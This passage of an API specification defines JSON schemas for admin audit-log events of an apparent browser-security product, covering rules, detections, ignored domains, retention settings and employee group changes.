enumeration\" setting is enabled or not."}}}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_649"},"schema_650":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added a clipboard custom regex pattern."},"object":{"type":"string","enum":["CLIPBOARD_CUSTOM_REGEX_PATTERN_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Clipboard custom regex pattern added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"$ref":"#/components/schemas/ClipboardCustomRegexPattern","description":"Clipboard custom regex pattern details."}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_650"},"schema_651":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed a clipboard custom regex pattern."},"object":{"type":"string","enum":["CLIPBOARD_CUSTOM_REGEX_PATTERN_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Clipboard custom regex pattern removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the pattern."},"new":{"$ref":"#/components/schemas/ClipboardCustomRegexPattern","description":"Clipboard custom regex pattern details."}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_651"},"schema_652":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added ignored domains"},"object":{"type":"string","enum":["CLONED_LOGIN_PAGE_DETECTION_IGNORED_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Cloned Login Page Detection ignored domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_652"},"schema_653":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed ignored domains"},"object":{"type":"string","enum":["CLONED_LOGIN_PAGE_DETECTION_IGNORED_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Cloned Login Page Detection ignored domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_653"},"schema_654":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CONTROL_RULE_ADDED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Control rule added"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added a control rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the updated rule.","allOf":[{"$ref":"#/components/schemas/ControlRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_654"},"schema_655":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CONTROL_RULE_UPDATED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Control rule updated"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated a control rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The current details of the updated rule.","allOf":[{"$ref":"#/components/schemas/ControlRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_655"},"schema_656":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CONTROL_RULE_REMOVED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Control rule removed"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed a control rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the removed rule.","allOf":[{"$ref":"#/components/schemas/ControlRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_656"},"schema_657":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CONTROL_RULE_TOGGLED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Control rule toggled"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com enabled/disabled a control rule"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the enabled/disabled rule.","allOf":[{"$ref":"#/components/schemas/ControlRule"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_657"},"schema_658":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CONTROL_RULE_REORDERED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Control rule reordered"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com reordered the control configuration rules"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"reorderedRule":{"description":"The details of the reordered rule.","allOf":[{"$ref":"#/components/schemas/ControlRule"}]},"previousRuleId":{"type":"string","format":"uuid","nullable":true,"description":"The unique identifier of the rule immediately before in precedence order. If null, the rule is now the first in the list.","example":"c478966c-f927-411c-b919-179832d3d50c"},"nextRuleId":{"type":"string","format":"uuid","nullable":true,"description":"The unique identifier of the rule immediately after in precedence order. If null, the rule is now the last in the list.","example":"c478966c-f927-411c-b919-179832d3d50c"}},"required":["reorderedRule","previousRuleId","nextRuleId"]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_658"},"schema_659":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CUSTOM_DETECTION_CREATED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Custom detection created"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com created a new custom detection."},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the created custom detection.","allOf":[{"$ref":"#/components/schemas/CustomDetectionConfiguration"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_659"},"schema_660":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CUSTOM_DETECTION_REMOVED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Custom detection removed"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed a custom detection."},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The details of the removed custom detection.","allOf":[{"$ref":"#/components/schemas/CustomDetectionConfiguration"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_660"},"schema_661":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["CUSTOM_DETECTION_UPDATED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Custom detection configuration updated"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the configuration of a custom detection."},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"description":"The current details of the updated custom detection.","allOf":[{"$ref":"#/components/schemas/CustomDetectionConfiguration"}]}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_661"},"schema_662":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example added a custom login URL for Google Workspace"},"object":{"type":"string","enum":["CUSTOM_LOGIN_URL_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Custom login URL added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"app":{"type":"string","description":"The app for which the custom login URL was added."},"url":{"type":"string","description":"The custom login URL that was added."}},"required":["app","url"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_662"},"schema_663":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example removed a custom login URL for Google Workspace"},"object":{"type":"string","enum":["CUSTOM_LOGIN_URL_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Custom login URL removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"app":{"type":"string","description":"The app for which the custom login URL was removed."}},"required":["app"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_663"},"schema_664":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event.\n\nNote: this is subject to change and should not be used to match on this object.\n","example":"user@example.com enabled data retention for 12 months"},"object":{"type":"string","enum":["DATA_RETENTION_CONFIGURATION_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object.\n\nNote: this is subject to change and should not be used to match on this object.\n","example":"Data retention configuration updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the user that performed the action."},"new":{"type":"object","properties":{"retentionPeriod":{"type":"object","nullable":true,"description":"The retention period in months. This will be null if the data retention feature is disabled."}},"required":["retentionPeriod"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_664"},"schema_665":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com archived a detection"},"object":{"type":"string","enum":["DETECTION_ARCHIVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Detection archived"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"id":{"type":"string","description":"The ID of the detection.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"archived":{"type":"boolean","description":"The archive status of the detection.","example":true}},"required":["id","archived"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_665"},"schema_666":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the classification of a detection"},"object":{"type":"string","enum":["DETECTION_CLASSIFICATION_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Detection classification updated"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"id":{"type":"string","description":"The ID of the detection.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"classification":{"type":"string","nullable":true,"enum":["TRUE_POSITIVE","BENIGN_TRUE_POSITIVE","FALSE_POSITIVE"],"description":"The classification of the detection.","example":"FALSE_POSITIVE"}},"required":["id","classification"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_666"},"schema_667":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["DETECTION_SCREENSHOTS_TOGGLED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Detection screenshots toggled"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example toggled detection screenshots to True"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the \"Detection screenshots\" setting is enabled or not."}}}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_667"},"schema_668":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added ignored domains"},"object":{"type":"string","enum":["DOMAIN_CATEGORY_BLOCKING_IGNORED_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Domain Category Blocking ignored domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_668"},"schema_669":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed ignored domains"},"object":{"type":"string","enum":["DOMAIN_CATEGORY_BLOCKING_IGNORED_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Domain Category Blocking ignored domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_669"},"schema_670":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"object":{"type":"string","enum":["DOMAIN_ENRICHMENT_TOGGLED"],"description":"The type of event."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"domain enrichment toggled"},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com toggled domain enrichment to True"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the domain enrichment setting was set to enabled or not."}}}},"required":["version","id","tenantId","timestamp","category","object","friendlyName","description","actor","new"]},"id":"schema_670"},"schema_671":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added employees to the group Engineers"},"object":{"type":"string","enum":["EMPLOYEE_ADDED_TO_GROUP"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employees added to group"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"group":{"type":"string","description":"The name of the group."},"employeeIds":{"type":"array","items":{"type":"string"},"description":"The IDs of the employees added to the group."}},"required":["group","employeeIds"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_671"},"schema_672":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com temporarily disabled the Push extension on domain some-domain.com."},"object":{"type":"string","enum":["EMPLOYEE_DISABLED_EXTENSION"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Employee disabled extension"},"actor":{"type":"object","$ref":"#/components/schemas/AdminAuditLogActorEmployee"},"new":{"type":"object","properties":{"browserId":{"type":"string","description":"The identifier of the employee's Push extension."},"domain":{"type":"string","description":"The domain for which the extension was disabled."},"disabledUntilTimestamp":{"type":"integer","description":"The timestamp when the extension will be re-enabled on the specified domain, formatted as a UNIX timestamp (in seconds)."}},"required":["browserId","domain","disabledUntilTimestamp"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_672"},"schema_673":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example added excluded extension domains"},"object":{"type":"string","enum":["EXCLUDED_EXTENSION_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Excluded extension domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the 